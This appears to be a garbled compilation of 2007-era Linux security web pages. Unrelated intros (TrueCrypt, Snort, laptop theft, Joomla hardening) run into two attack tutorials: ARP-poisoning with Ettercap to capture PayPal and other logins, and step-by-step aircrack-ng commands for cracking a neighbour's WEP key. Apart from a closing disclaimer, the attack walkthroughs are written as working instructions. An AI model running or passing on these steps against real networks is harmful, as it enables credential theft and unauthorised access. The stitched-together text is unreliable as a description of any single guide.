Version 1.0
Author: Oliver Meyer <o [dot] meyer [at] projektfarm [dot] de>
Last edited 12/18/2007
This document describes how to set up TrueCrypt with GUI on Ubuntu 7.10. TrueCrypt is a free open-source encryption software for desktop usage.
This howto is a practical guide without any warranty – it doesn’t cover the theoretical backgrounds. There are many ways to set up such a system – this is the way I chose.
This tutorial is based on another howto written by DevilMan, however I didn’t like the idea of manually compiling every package or the use of a GUI to get the software installed. This howto will work on a Gutsy Server or Gutsy desktop. With that said some of this howto is a direct copy from the original.
In this tutorial I will describe how to install and configure Snort (an intrusion detection system (IDS)) from source, BASE (Basic Analysis and Security Engine), MySQL, and Apache2 on Ubuntu 7.10 (Gutsy Gibbon). Snort will assist you in monitoring your network and alert you about possible threats. Snort will output its log files to a MySQL database which BASE will use to display a graphical interface in a web browser.
Laptop and notebooks are being stolen at an ever-increasing rate. In 2004, Safeware Insurance which sells computer insurance, estimated 600,000 laptop and notebooks a year were being stolen. In 2006 an estimated 750,000 were being swiped, according to Absolute Software a company that makes computer tracking products — and does not support Linux. LoJack For Laptops, another computer tracing company — which also does not support Linux — says FBI statistics show 2 million laptop and notebook computers were stolen in the US in a recent year. While the figures may not agree in detail, they all show that laptop and notebook theft is a major problem — and if you’re not careful, your Linux laptop might be next.
While you can find dozens of products to secure Windows laptops, security products for Linux laptops are scarcer — but they do exist. We found a range of products and fixes ranging from security patches for the operating system to encryption to the equivalent of computer bicycle locks which can help keep your Linux laptop or notebook safe.
Joomla! is a well-known content management system, mature enough to be used by thousands of amateur and professional Web portals. Installation is a breeze and consists of six click-next steps. However, a default Joomla! installation is not necessarily a secure one, so let’s see how we can protect our portal from potential attackers.
The first rule of security when it comes to Joomla! is “update frequently,” because whenever a new version comes out, it usually comprises several user-reported bug and security fixes. If your host allows it, use PHP5 instead of PHP4, because it’s more advanced and offers better security.
Once your site is ready to be launched, make sure to set your configuration.php file to read-only — a critical step that most users neglect. Change file and directory permissions — chmod 644 for files and chmod 755 for folders — but be sure to keep temporary and cache directories writable, lest you get a site error.
Introduction
Do you think you’re safe if you type https :// before paypal.com? I hope you’ll think twice before you login from a computer connected to a wireless network after reading this guide. Let’s start at the beginning. Let’s say you have an evil neighbour who wants your paypal credentials. He buys himself a nice laptop with a wireless card and, if you are using a wep encryption, he cracks your wep code (click here to see how). After cracking the key he logs into your network. Maybe you always allowed him to use your network because you thought it can’t do any harm to your computer. You aren’t sharing any folders so what’s the problem? Well, in the next few steps I’m going to describe the problem.
The guide
1. Let’s assume your neighbour uses linux to crack your wep key. After cracking it, he installs ettercap (http://ettercap.sourceforge.net/) on his linux system. If you want to do this at home, I would recommend you to download BackTrack because it already has everything installed. Look at the WEP cracking guide I mentioned above for more info about BackTrack. If you want to install it on your own linux distribution, download the source and install it with the following commands:
$ tar -xzvf ettercap-version.tar.gz
$ make
$ make install
2. After installing, you need to uncomment some code to enable SSL dissection. Open up a terminal window and type “nano /usr/local/etc/etter.confâ€, without the quotes. Scroll down using your arrow keys until you find this piece of code:
# if you use iptables:
# redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rportâ€
# redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rportâ€
You need to uncomment the last two lines.
# if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rportâ€
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rportâ€
3. Press CTRL+O, press enter to safe the file and then press CTRL+X.
4. Boot Ettercap and click on Sniff > Unified Sniffing > type in your wireless interface and press ok.
5. Press CTRL+S to scan for hosts
6. Go to MITM > ARP poisoning, select sniff remote connections and press ok.
7. Now you (and your neighbour!) can start sniffing! Press start > start sniffing. Walk to another computer on your network and open up paypal or any other site where you need to type in an username/password (gmail, hotmail, digg.com, etc.). All credentials will appear on the computer running Ettercap!
8. When you’re done, don’t just close Ettercap, but go to Start > Stop Sniffing, and then go to MITM > Stop mitm attack(s).
But how does all this stuff work?
Look at the following scheme:
Normally when you type in a password, host 1 (your computer) directly connects to host 2 (your modem or router). But if someone launced Ettercap on your network, host 1 isn’t sending it’s passwords to host 2, but to the Attacking host, the host that’s running Ettercap! The attacking host sends everything to Host 2. This means that host 1 isn’t noticing anything! Exactly the same happens with everything that host 2 is sending. Host 2 doesn’t send packets directly to host 1, but forst to the attacking host.
##### Preparation #####
1. Download BackTrack (http://www.remote-exploit.org/index.php/BackTrack_Downloads)
2. Install BackTrack to your hd or just boot the live cd (username: root, password: toor; Don’t froget to start the gui: type in startx on the command lien after logging in).
3. Start up a terminal and set your wireless interface in monitor mode.
iwconfig [wireless interface] mode monitor
* to find out what your wireless interface is, type iwconfig and press enter. All interfaces will show up (mine is ath0).
4. Start airodump by typing in the terminal (press enter after typing it in)
airodump-ng –ivs -w capture [wireless interface]
5. When airodump found the network you want to hack it’ll show up. Note the BSSID (acces point’s mac address) and the SSID (the access point’s name). Don’t close this terminal window or stop airodump from running before you have the wep key!
##### Generating data, method one: There are clients visible in airodump associated to the network #####
1. Open a new terminal window and type in (press enter after typing in):
aireplay-ng [wireless interface] –arpreplay -e [the SSID you found with airodump] -b [the BSSID you found wth airodump] -h [the client’s MAC adress]
2. Open another new terminal window and type in (press enter after typing in):
aireplay-ng [wireless interface] –deauth 10 -a [the client’s MAC adress]
3. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.
##### Generating data, method two: There are NO clients visible in airodump associated to the network #####
1. Open a new terminal window and type in (do NOT press the enter button!)
aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06
2. Open another new terminal window and type in (do NOT press the enter button!):
aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06
3. Press enter in the fakeauth terminal and after it started to fakeauth, press enter as quickly as possible in the arpreplay window.
3. Open another new terminal window and type in (press enter after typing in):
aireplay-ng [wireless interface] –deauth 10 -a 01:02:03:04:05:06
4. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.
##### If the above two methods aren’t working, try this #####
1. Open a new terminal window and type in (press the enter button after typing it in):
aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06
2. Open another new terminal window and type in (press the enter button after typing it in):
aireplay-ng [wireless interface] –chopchop -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06
3. The chopchop starts reading packages. When it finds one, it’ll ask you to use it. Choose yes. Wait a few seconds/minutes and remember the filename that is given to you at the end.
4. Open Ethereal (click the icon in the bottom left corner > Backtrack > Sniffers > Ethereal) and open the xor file made with the chopchop attack in Ethereal (it’s located in the home folder)
5. Look with Ethereal in the captured file. Try to find the source ip and the destination ip: write those addresses down somewhere.
6. open a terminal and type in (press enter after typing in):
arpforge-ng [the name of the xor file from the chopchop attack] 1 [the BSSID you found wth airodump] 01:02:03:04:05:06 [the source ip] [the destination ip] arp.cap
7. In a new or in the same terinal window, type in (and press enter):
aireplay-ng -2 ath0 -r arp.cap
5. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.
##### The actual cracking of the WEP key #####
1. Open a new terminal window and type in
airecrack-ng -n 64 capture-01.ivs (for a 64 bits encryption, enter after typing)
or
airecrack-ng -n 128 capture-01.ivs (for a 128 bits encryption, enter after typing)
If you don’t know how strong the encryption is, type in both in different terminals and start a third terminal. Type in this code:
airecrack-ng capture-01.ivs
2. Wait a few minutes. Check the terminal(s). The code will automaticly show up if found. Keep airodump running!
##### Disclaimer #####
I don’t think have to mention that you need written permission from the owner of the network before you are allowed to start cracking his wep or even before you are allowed to capture packages. Just try it with your own network. You’ll learn a lot about it. But never ever try it with another network than your own.
##### Donations #####
I hope you enjoyed reading this guide. I did enjoy writing it, but I really don’t enjoy paying the bills for hosting and bandwidth. Please help me keeping this site up and buy some funny t-shirts from my t-shirt store (the link is on the navigation menu on top of this website).
Thanks.
